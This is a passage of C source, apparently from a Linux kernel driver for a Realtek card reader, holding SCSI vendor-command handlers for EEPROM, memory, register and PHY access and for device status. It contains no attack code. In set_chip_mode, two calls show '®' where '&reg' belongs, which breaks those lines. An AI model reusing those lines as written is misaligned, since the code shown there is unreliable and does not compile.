if (CHECK_PID(chip, 0x5209) && chip->max_payload) {
retval = rtsx_write_cfg_dw(chip, 0, 0x78, 0xFF, 0x10);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
}
}
return retval;
}
static int read_format_capacity(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned char *buf;
unsigned int lun = SCSI_LUN(srb);
unsigned int buf_len;
u8 card = get_lun_card(chip, lun);
u32 card_size;
int desc_cnt;
int i = 0;
if (!check_card_ready(chip, lun)) {
if (!chip->mspro_formatter_enable) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
buf_len = (scsi_bufflen(srb) > 12) ? 0x14 : 12;
buf = kmalloc(buf_len, GFP_KERNEL);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
buf[i++] = 0;
buf[i++] = 0;
buf[i++] = 0;
/* Capacity List Length */
if ((buf_len > 12) && chip->mspro_formatter_enable &&
(chip->lun2card[lun] & MS_CARD) &&
(!card || (card == MS_CARD))) {
buf[i++] = 0x10;
desc_cnt = 2;
} else {
buf[i++] = 0x08;
desc_cnt = 1;
}
while (desc_cnt) {
if (check_card_ready(chip, lun)) {
card_size = get_card_size(chip, lun);
buf[i++] = (unsigned char)(card_size >> 24);
buf[i++] = (unsigned char)(card_size >> 16);
buf[i++] = (unsigned char)(card_size >> 8);
buf[i++] = (unsigned char)card_size;
if (desc_cnt == 2) {
buf[i++] = 2;
} else {
buf[i++] = 0;
}
} else {
buf[i++] = 0xFF;
buf[i++] = 0xFF;
buf[i++] = 0xFF;
buf[i++] = 0xFF;
if (desc_cnt == 2) {
buf[i++] = 3;
} else {
buf[i++] = 0;
}
}
buf[i++] = 0x00;
buf[i++] = 0x02;
buf[i++] = 0x00;
desc_cnt--;
}
buf_len = min(scsi_bufflen(srb), buf_len);
rtsx_stor_set_xfer_buf(buf, buf_len, srb);
kfree(buf);
scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);
return TRANSPORT_GOOD;
}
static int read_capacity(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned char *buf;
unsigned int lun = SCSI_LUN(srb);
u32 card_size;
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (!(CHK_BIT(chip->lun_mc, lun))) {
SET_BIT(chip->lun_mc, lun);
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_CHANGE);
return TRANSPORT_FAILED;
}
buf = kmalloc(8, GFP_KERNEL);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
card_size = get_card_size(chip, lun);
buf[0] = (unsigned char)((card_size - 1) >> 24);
buf[1] = (unsigned char)((card_size - 1) >> 16);
buf[2] = (unsigned char)((card_size - 1) >> 8);
buf[3] = (unsigned char)(card_size - 1);
buf[4] = 0x00;
buf[5] = 0x00;
buf[6] = 0x02;
buf[7] = 0x00;
rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
kfree(buf);
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
static int read_eeprom(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = spi_read_eeprom(chip, i, buf + i);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
static int write_eeprom(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (len == 511) {
retval = spi_erase_eeprom_chip(chip);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
for (i = 0; i < len; i++) {
retval = spi_write_eeprom(chip, i, buf[i]);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
vfree(buf);
}
return TRANSPORT_GOOD;
}
static int read_mem(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[2] << 8) | srb->cmnd[3];
len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
if (addr < 0xFC00) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = rtsx_read_register(chip, addr + i, buf + i);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
static int write_mem(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[2] << 8) | srb->cmnd[3];
len = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
if (addr < 0xFC00) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = rtsx_write_register(chip, addr + i, 0xFF, buf[i]);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
vfree(buf);
return TRANSPORT_GOOD;
}
static int get_sd_csd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct sd_info *sd_card = &(chip->sd_card);
unsigned int lun = SCSI_LUN(srb);
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (get_lun_card(chip, lun) != SD_CARD) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
rtsx_stor_set_xfer_buf(sd_card->raw_csd, scsi_bufflen(srb), srb);
return TRANSPORT_GOOD;
}
static int toggle_gpio_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
u8 gpio = srb->cmnd[2];
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
if (gpio > 3)
gpio = 1;
toggle_gpio(chip, gpio);
return TRANSPORT_GOOD;
}
#ifdef _MSG_TRACE
static int trace_msg_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned char *ptr, *buf = NULL;
int i, msg_cnt;
u8 clear;
unsigned int buf_len;
buf_len = 4 + ((2 + MSG_FUNC_LEN + MSG_FILE_LEN + TIME_VAL_LEN) * TRACE_ITEM_CNT);
if ((scsi_bufflen(srb) < buf_len) || (scsi_sglist(srb) == NULL)) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
clear = srb->cmnd[2];
buf = (unsigned char *)vmalloc(scsi_bufflen(srb));
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
ptr = buf;
if (chip->trace_msg[chip->msg_idx].valid) {
msg_cnt = TRACE_ITEM_CNT;
} else {
msg_cnt = chip->msg_idx;
}
*(ptr++) = (u8)(msg_cnt >> 24);
*(ptr++) = (u8)(msg_cnt >> 16);
*(ptr++) = (u8)(msg_cnt >> 8);
*(ptr++) = (u8)msg_cnt;
RTSX_DEBUGP("Trace message count is %d\n", msg_cnt);
for (i = 1; i <= msg_cnt; i++) {
int j, idx;
idx = chip->msg_idx - i;
if (idx < 0)
idx += TRACE_ITEM_CNT;
*(ptr++) = (u8)(chip->trace_msg[idx].line >> 8);
*(ptr++) = (u8)(chip->trace_msg[idx].line);
for (j = 0; j < MSG_FUNC_LEN; j++) {
*(ptr++) = chip->trace_msg[idx].func[j];
}
for (j = 0; j < MSG_FILE_LEN; j++) {
*(ptr++) = chip->trace_msg[idx].file[j];
}
for (j = 0; j < TIME_VAL_LEN; j++) {
*(ptr++) = chip->trace_msg[idx].timeval_buf[j];
}
}
rtsx_stor_set_xfer_buf(buf, scsi_bufflen(srb), srb);
vfree(buf);
if (clear) {
chip->msg_idx = 0;
for (i = 0; i < TRACE_ITEM_CNT; i++)
chip->trace_msg[i].valid = 0;
}
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
#endif
static int read_host_reg(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
u8 addr, buf[4];
u32 val;
unsigned int len;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = srb->cmnd[4];
val = rtsx_readl(chip, addr);
RTSX_DEBUGP("Host register (0x%x): 0x%x\n", addr, val);
buf[0] = (u8)(val >> 24);
buf[1] = (u8)(val >> 16);
buf[2] = (u8)(val >> 8);
buf[3] = (u8)val;
len = min(scsi_bufflen(srb), (unsigned int)4);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
return TRANSPORT_GOOD;
}
static int write_host_reg(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
u8 addr, buf[4];
u32 val;
unsigned int len;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = srb->cmnd[4];
len = min(scsi_bufflen(srb), (unsigned int)4);
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
val = ((u32)buf[0] << 24) | ((u32)buf[1] << 16) | ((u32)buf[2] << 8) | buf[3];
rtsx_writel(chip, addr, val);
return TRANSPORT_GOOD;
}
static int set_variable(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned lun = SCSI_LUN(srb);
if (srb->cmnd[3] == 1) {
/* Variable Clock */
struct xd_info *xd_card = &(chip->xd_card);
struct sd_info *sd_card = &(chip->sd_card);
struct ms_info *ms_card = &(chip->ms_card);
switch (srb->cmnd[4]) {
case XD_CARD:
xd_card->xd_clock = srb->cmnd[5];
break;
case SD_CARD:
sd_card->sd_clock = srb->cmnd[5];
break;
case MS_CARD:
ms_card->ms_clock = srb->cmnd[5];
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else if (srb->cmnd[3] == 2) {
if (srb->cmnd[4]) {
chip->blink_led = 1;
} else {
int retval;
chip->blink_led = 0;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
turn_off_led(chip, LED_GPIO);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int get_variable(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
if (srb->cmnd[3] == 1) {
struct xd_info *xd_card = &(chip->xd_card);
struct sd_info *sd_card = &(chip->sd_card);
struct ms_info *ms_card = &(chip->ms_card);
u8 tmp;
switch (srb->cmnd[4]) {
case XD_CARD:
tmp = (u8)(xd_card->xd_clock);
break;
case SD_CARD:
tmp = (u8)(sd_card->sd_clock);
break;
case MS_CARD:
tmp = (u8)(ms_card->ms_clock);
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_stor_set_xfer_buf(&tmp, 1, srb);
} else if (srb->cmnd[3] == 2) {
u8 tmp = chip->blink_led;
rtsx_stor_set_xfer_buf(&tmp, 1, srb);
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int dma_access_ring_buffer(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval;
unsigned int lun = SCSI_LUN(srb);
u16 len;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
len = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
len = min(len, (u16)scsi_bufflen(srb));
if (srb->sc_data_direction == DMA_FROM_DEVICE) {
RTSX_DEBUGP("Read from device\n");
} else {
RTSX_DEBUGP("Write to device\n");
}
retval = rtsx_transfer_data(chip, 0, scsi_sglist(srb), len,
scsi_sg_count(srb), srb->sc_data_direction, 1000);
if (retval < 0) {
if (srb->sc_data_direction == DMA_FROM_DEVICE) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
}
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
static int get_dev_status(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct sd_info *sd_card = &(chip->sd_card);
struct ms_info *ms_card = &(chip->ms_card);
int buf_len;
unsigned int lun = SCSI_LUN(srb);
u8 card = get_lun_card(chip, lun);
u8 status[32];
#ifdef SUPPORT_OCP
u8 oc_now_mask = 0, oc_ever_mask = 0;
#endif
memset(status, 0, 32);
status[0] = (u8)(chip->product_id);
status[1] = chip->ic_version;
if (chip->auto_delink_en) {
status[2] = 0x10;
} else {
status[2] = 0x00;
}
status[3] = 20;
status[4] = 10;
status[5] = 05;
status[6] = 21;
if (chip->card_wp) {
status[7] = 0x20;
} else {
status[7] = 0x00;
}
#ifdef SUPPORT_OCP
status[8] = 0;
if (CHECK_LUN_MODE(chip, SD_MS_2LUN) && (chip->lun2card[lun] == MS_CARD)) {
oc_now_mask = MS_OC_NOW;
oc_ever_mask = MS_OC_EVER;
} else {
oc_now_mask = SD_OC_NOW;
oc_ever_mask = SD_OC_EVER;
}
if (chip->ocp_stat & oc_now_mask) {
status[8] |= 0x02;
}
if (chip->ocp_stat & oc_ever_mask) {
status[8] |= 0x01;
}
#endif
if (card == SD_CARD) {
if (CHK_SD(sd_card)) {
if (CHK_SD_HCXC(sd_card)) {
if (sd_card->capacity > 0x4000000) {
status[0x0E] = 0x02;
} else {
status[0x0E] = 0x01;
}
} else {
status[0x0E] = 0x00;
}
if (CHK_SD_SDR104(sd_card)) {
status[0x0F] = 0x03;
} else if (CHK_SD_DDR50(sd_card)) {
status[0x0F] = 0x04;
} else if (CHK_SD_SDR50(sd_card)) {
status[0x0F] = 0x02;
} else if (CHK_SD_HS(sd_card)) {
status[0x0F] = 0x01;
} else {
status[0x0F] = 0x00;
}
} else {
if (CHK_MMC_SECTOR_MODE(sd_card)) {
status[0x0E] = 0x01;
} else {
status[0x0E] = 0x00;
}
if (CHK_MMC_DDR52(sd_card)) {
status[0x0F] = 0x03;
} else if (CHK_MMC_52M(sd_card)) {
status[0x0F] = 0x02;
} else if (CHK_MMC_26M(sd_card)) {
status[0x0F] = 0x01;
} else {
status[0x0F] = 0x00;
}
}
} else if (card == MS_CARD) {
if (CHK_MSPRO(ms_card)) {
if (CHK_MSXC(ms_card)) {
status[0x0E] = 0x01;
} else {
status[0x0E] = 0x00;
}
if (CHK_HG8BIT(ms_card)) {
status[0x0F] = 0x01;
} else {
status[0x0F] = 0x00;
}
}
}
#ifdef SUPPORT_SD_LOCK
if (card == SD_CARD) {
status[0x17] = 0x80;
if (sd_card->sd_erase_status)
status[0x17] |= 0x01;
if (sd_card->sd_lock_status & SD_LOCKED) {
status[0x17] |= 0x02;
status[0x07] |= 0x40;
}
if (sd_card->sd_lock_status & SD_PWD_EXIST)
status[0x17] |= 0x04;
} else {
status[0x17] = 0x00;
}
RTSX_DEBUGP("status[0x17] = 0x%x\n", status[0x17]);
#endif
status[0x18] = 0x8A;
status[0x1A] = 0x28;
#ifdef SUPPORT_SD_LOCK
status[0x1F] = 0x01;
#endif
buf_len = min(scsi_bufflen(srb), (unsigned int)sizeof(status));
rtsx_stor_set_xfer_buf(status, buf_len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);
return TRANSPORT_GOOD;
}
static int set_chip_mode(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int phy_debug_mode;
int retval;
u16 reg;
if (!CHECK_PID(chip, 0x5208)) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
phy_debug_mode = (int)(srb->cmnd[3]);
if (phy_debug_mode) {
chip->phy_debug_mode = 1;
retval = rtsx_write_register(chip, CDRESUMECTL, 0x77, 0);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_disable_bus_int(chip);
retval = rtsx_read_phy_register(chip, 0x1C, ®);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
reg |= 0x0001;
retval = rtsx_write_phy_register(chip, 0x1C, reg);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
chip->phy_debug_mode = 0;
retval = rtsx_write_register(chip, CDRESUMECTL, 0x77, 0x77);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_enable_bus_int(chip);
retval = rtsx_read_phy_register(chip, 0x1C, ®);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
reg &= 0xFFFE;
retval = rtsx_write_phy_register(chip, 0x1C, reg);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
return TRANSPORT_GOOD;
}
static int rw_mem_cmd_buf(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval = STATUS_SUCCESS;
unsigned int lun = SCSI_LUN(srb);
u8 cmd_type, mask, value, idx;
u16 addr;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
switch (srb->cmnd[3]) {
case INIT_BATCHCMD:
rtsx_init_cmd(chip);
break;
case ADD_BATCHCMD:
cmd_type = srb->cmnd[4];
if (cmd_type > 2) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
addr = (srb->cmnd[5] << 8) | srb->cmnd[6];
mask = srb->cmnd[7];
value = srb->cmnd[8];
rtsx_add_cmd(chip, cmd_type, addr, mask, value);
break;
case SEND_BATCHCMD:
retval = rtsx_send_cmd(chip, 0, 1000);
break;
case GET_BATCHRSP:
idx = srb->cmnd[4];
value = *(rtsx_get_cmd_data(chip) + idx);
if (scsi_bufflen(srb) < 1) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_stor_set_xfer_buf(&value, 1, srb);
scsi_set_resid(srb, 0);
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int suit_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int result;
switch (srb->cmnd[3]) {
case INIT_BATCHCMD:
case ADD_BATCHCMD:
case SEND_BATCHCMD:
case GET_BATCHRSP:
result = rw_mem_cmd_buf(srb, chip);
break;
default:
result = TRANSPORT_ERROR;
}
return result;
}
static int read_phy_register(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
u16 val;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];
if (len % 2)
len -= len % 2;
if (len) {
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len / 2; i++) {
retval = rtsx_read_phy_register(chip, addr + i, &val);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
buf[2*i] = (u8)(val >> 8);
buf[2*i+1] = (u8)val;
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
}
return TRANSPORT_GOOD;
}
static int write_phy_register(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
u16 val;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];
if (len % 2)
len -= len % 2;
if (len) {
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len / 2; i++) {
val = ((u16)buf[2*i] << 8) | buf[2*i+1];
retval = rtsx_write_phy_register(chip, addr + i, val);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
vfree(buf);
}
return TRANSPORT_GOOD;
}
static int erase_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr;
int retval;
u8 mode;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
mode = srb->cmnd[3];
addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
if (mode == 0) {
retval = spi_erase_eeprom_chip(chip);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else if (mode == 1) {
retval = spi_erase_eeprom_byte(chip, addr);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int read_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = spi_read_eeprom(chip, addr + i, buf + i);
if (retval != STATUS_SUCCESS) {
